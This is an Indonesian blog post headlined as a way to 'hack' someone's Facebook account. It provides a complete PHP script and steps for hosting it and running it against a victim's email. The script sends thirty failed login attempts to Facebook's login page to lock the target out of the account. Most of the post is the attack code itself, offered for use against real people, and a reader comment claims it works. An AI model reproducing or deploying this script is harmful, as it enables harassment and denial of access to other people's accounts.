KALAU ANDA SUKA KLIK DISINI

html,body{ scrollbar-face-color:#3F90D8; scrollbar-shadow-color:#3F90D8; scrollbar-highlight-color:#3F90D8; scrollbar-3dlight-color:#3F90D8; scrollbar-darkshadow-color:#3F90D8; scrollbar-track-color:#00B4F3; scrollbar-arrow-color:#48515A; scrollbar-base-color:#00B4F3; } td{ font-family:Arial, sans-serif; font-size:8pt; color:#7C0000; } .mnbdy{ background-color:#00CC84; overflow:auto; padding:2px; margin:0px; } .fmbdy{ background-color:#00B4F3; padding:2px; margin:0px; } A:link{ text-decoration:none; color:#90F3F3; } A:visited{ text-decoration:none; color:#90F3F3; } A:active{ text-decoration:underline; color:#FFFFFF; } A:hover{ text-decoration:underline; color:#FFFFFF; } .hbtbl{ table-layout:fixed; word-wrap:break-word; overflow:hidden; } .stxt{ background-color:#00CC84; color:#7C0000; } .stxt2{ background-color:#3F90D8; color:#BDEAFC; } .dtxt{ color:#FFF844; font-size:7pt; text-align:right; } .dtxt2{ color:#BDEAFC; font-size:7pt; text-align:right; } .pn_std{ } .pn_reg{ } .pn_mod{ } .pn_adm{ } .cfrm{ margin-bottom:0px; } .frmtb{ padding-left:3px; padding-right:3px; font-family:Arial, sans-serif; font-size:8pt; background-color:#3F90D8; border:#48515A 1px solid; color:#E1FCFC; margin: 1px 2px 1px 2px; } .frmbtn{ font-family:Arial, sans-serif; font-size:8pt; background-color:#3F90D8; border:#48515A 1px solid; color:#FFFFFF; font-weight:bold; padding-left:3px; padding-right:3px; vertical-align:top; margin: 2px 2px 2px 2px; } .lnk{ color:#90F3F3; } .pic{ width:45px; height:45px; margin-left:-2px; margin-right:0px; padding-right:2px; float:left; }

close

Rabu, 17 Oktober 2012

CARA HACK FB ORANG LEWAT NOTEPAD

Posted by ardian wijaya 03.21, under | 1 comment

Hello , ApaKabar DI ARDIAN BLOG .. Moga Baik" Aja yach . ^_^ . Kembali Lagi Bersama Saya . Administator Di blogs Ini . Sekarang Saya Akan Share Bagaimana Cara Hack Facebook Orang . Dalam Artikel Ini . Saya Akan Berbagi Ilmu Sama Kalian Semua Para Freak-Zone/Ghalis-Zoners . Yuk Langsung Kita Praktekin .. Saya Share ini Memiliki Fungsi Sama Persis Dengan Software Hack Facebook . Yaitu Bikin Beku / Ga Bisa Buat Login Facebook Seseorang , Tapi Versi WebPhp Jadi Senjata . 1. Yang Harus Anda Siapkan Adalah : - Hosting Yang Support Php Dan cURL ( Jangan 000WebHost ) - Notepad 2. Copy Script Di Bawah Ini Ke Notepad Caranya mudah , copy script dibawah ini ke notepad : PHP Facebook Freezer”; echo “

Email :


”; $email=$_POST['email']; $passwd=’123′; if(isset($email) && isset($passwd)){ $kue=”/tmp/”.rand().”.txt”; $url=’https://login.facebook.com/login.php’; $login=”email=$email&pass=$passwd&login=Log In”; define(“_COK_”, $kue); curlget($url); for ($number=1; $number<=30; $number++) { $data=curlpost($url,$login); } echo $data; } function curlget($url){ $agent=$_SERVER['HTTP_USER_AGENT']; $curl=curl_init(); curl_setopt($curl, CURLOPT_URL,$url); curl_setopt($curl, CURLOPT_USERAGENT, $agent); curl_setopt($curl, CURLOPT_RETURNTRANSFER ,1); curl_setopt($curl, CURLOPT_FOLLOWLOCATION ,1); curl_setopt($curl, CURLOPT_ENCODING, “”); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($curl, CURLOPT_COOKIEFILE, _COK_); curl_setopt($curl, CURLOPT_COOKIEJAR, _COK_); $data = curl_exec($curl); curl_close ($curl); return $data; } function curlpost($url,$post){ $agent=$_SERVER['HTTP_USER_AGENT']; $curl=curl_init(); curl_setopt($curl, CURLOPT_URL,$url); curl_setopt($curl, CURLOPT_USERAGENT, $agent); curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_POSTFIELDS, $post); curl_setopt($curl, CURLOPT_ENCODING, “”); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($curl, CURLOPT_FOLLOWLOCATION ,1); curl_setopt($curl, CURLOPT_RETURNTRANSFER ,1); curl_setopt($curl, CURLOPT_COOKIEFILE, _COK_); curl_setopt($curl, CURLOPT_COOKIEJAR, _COK_); $data = curl_exec($curl); curl_close ($curl); return $data; } echo “”; ?> 3. Setelah Kamu Berhasil MengCopy Script Untuk Hack Facebook DiAtas , Kini Saatnya Untuk Menyimpan Dengan Nama ghalis-zone.php 4. Setelah Itu Kamu Upload Fb.Php Ke Hostinganmu Yang Support cURL Dan Php . Nih Contoh Jadinya Setelah Saya Upload = Here 5. Kalau File Udah Di Upload Kini Tinggal Cara Mainnya ..... 6. Buka File Yang Kamu Upload Tadi ex : http://wolimierz.org/images/nomoredisk.php 7. Setelah Itu Masukan Dah Email Target Kamu .. Maka Dia Ga Akan Bisa Login [ Tapi Ga Permanent ] 8. Sucses .... Sumber : http://ghalis-zone.blogspot.com/2012/08/cara-mengehack-facebook-orang.html#ixzz29YB1sIWx

1 komentar:

wah 100% work makasih gan

Poskan Komentar